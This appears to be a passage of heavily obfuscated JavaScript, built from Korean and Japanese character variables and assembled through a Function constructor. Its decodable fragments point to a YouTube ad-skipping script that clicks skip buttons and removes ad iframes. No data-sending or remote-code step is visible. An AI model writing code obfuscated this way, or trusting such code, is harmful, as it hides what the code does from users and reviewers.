'+'('+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'.'+가다+나う+$+(25)[가](30)+가나+あ+나あ+'-'+가나+あ+い+(([]+[])[나]+[])[14]+가あ+あ+(([]+[])[나]+[])[14]+う+' '+'.'+가$+う+(33)[가](34)+가$+"'"+')'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'.'+가나+あ+い+(([]+[])[나]+[])[14]+가あ+あ+(([]+[])[나]+[])[14]+う+'-'+$+う+가나+う+_+가$+가가+나다+' '+'.'+가가+(25)[가](30)+가$+나う+가가+い+':'+い+가$+(17)[가](20)+'-'+_+(17)[가](20)+나う+가나+가다+'('+'9'+'0'+')'+"'"+')'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'5'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+(([]+[])[나]+[])[14]+う+가$+'_'+가$+あ+$+(20)[가](21)+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+나い+가あ+い+_+가$+나う+가가+い+' '+나う+$+'_'+(32)[가](33)+나う+가다+(([]+[])[나]+[])[14]+う+가$+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+い+う+(32)[가](33)+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'0'+'"'+')')()+나다+가가+((0)[나]+[])[11]+나う+$+う+'('+나다+う+$+가가+가나+([][다]+[])[23]+う+' '+'='+'>'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가$+' '+나う+い+가$+う+나다+([][다]+[])[23]+あ+가나+' '+'='+' '+$+う+가$+가う+い+가$+う+나다+([][다]+[])[23]+あ+가나+'('+'('+')'+' '+'='+'>'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가$+' '+나う+나い+나다+あ+((0)[나]+[])[11]+う+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+나う+나い+나다+あ+((0)[나]+[])[11]+う+'['+$+나다+_+'*'+'='+'"'+い+う+(32)[가](33)+あ+$+$+う+가$+$+'.'+(17)[가](20)+_+あ+(25)[가](30)+가$+_+(17)[가](20)+あ+'.'+_+가가+((0)[나]+[])[11]+'"'+']'+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나う+나い+' '+'('+나う+나い+나다+あ+((0)[나]+[])[11]+う+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+_+가나+う+あ+나다+가う+い+가$+う+나다+([][다]+[])[23]+あ+가나+'('+나う+い+가$+う+나다+([][다]+[])[23]+あ+가나+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+$+가가+가나+([][다]+[])[23]+う+'('+가$+나다+가あ+う+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+'}'+','+' '+'5'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+나い+가あ+い+_+가$+나う+가가+い+' '+나う+$+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+(17)[가](20)+'2'+'.'+(25)[가](30)+나다+가가+((0)[나]+[])[11]+(25)[가](30)+가$+'-'+가$+う+(33)[가](34)+가$+"'"+')'+' '+'!'+'='+'='+' '+い+가あ+가나+가나+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+あ+$+나あ+い+_+' '+나い+가あ+い+_+가$+나う+가가+い+' '+가가+(25)[가](30)+う+い+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'#'+あ+い+_+(17)[가](20)+가가+나다+"'"+')'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'1'+'0'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나う+나い+' '+'('+나う+$+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+가가+い+'_'+나う+((0)[나]+[])[11]+あ+(([]+[])[나]+[])[14]+う+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+나い+가あ+い+_+가$+나う+가가+い+' '+나う+$+'_'+い+가가+가$+$+가가+가나+([][다]+[])[23]+う+가다+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'/'+'/'+_+가가+い+$+가$+' '+_+(17)[가](20)+う+_+(20)[가](21)+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+가나+う+((0)[나]+[])[11]+う+い+가$+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+가다+나う+([][다]+[])[23]+'.'+_+(17)[가](20)+う+_+(20)[가](21)+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'/'+'/'+나다+う+가$+가あ+나다+い+' '+_+(17)[가](20)+う+_+(20)[가](21)+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+가나+う+((0)[나]+[])[11]+う+い+가$+' '+'&'+'&'+' '+_+(17)[가](20)+う+_+(20)[가](21)+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+가나+う+((0)[나]+[])[11]+う+い+가$+'.'+$+가$+나あ+가나+う+'.'+가다+나う+$+(25)[가](30)+가나+あ+나あ+' '+'='+'='+'='+' '+"'"+나나+가나+가가+_+(20)[가](21)+"'"+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+_+가가+い+$+가$+' '+う+나다+나다+가가+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+가다+나う+([][다]+[])[23]+'.'+う+나다+나다+가가+나다+'-'+가$+う+(33)[가](34)+가$+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+う+나다+나다+가가+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+' '+'&'+'&'+' '+'('+う+나다+나다+가가+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'.'+나う+い+い+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'.'+나う+い+_+가나+가あ+가다+う+$+'('+"'"+가う+い+가$+'é'+い+가$+あ+가나+가가+' '+가다+う+' '+い+가あ+う+([][다]+[])[23]+가가+"'"+')'+' '+'|'+'|'+' '+う+나다+나다+가가+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'.'+나う+い+い+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'.'+나う+い+_+가나+가あ+가다+う+$+'('+"'"+'⚠'+'️'+"'"+')'+' '+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'('+あ+$+나あ+い+_+' '+'('+')'+' '+'='+'>'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'1'+'0'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나う+나い+' '+'('+나う+$+'_'+(32)[가](33)+나う+가다+(([]+[])[나]+[])[14]+う+가$+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+가가+い+'_'+(32)[가](33)+나う+가다+(([]+[])[나]+[])[14]+う+가$+'_'+나い+나다+あ+((0)[나]+[])[11]+う+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+')'+'('+')'+';')()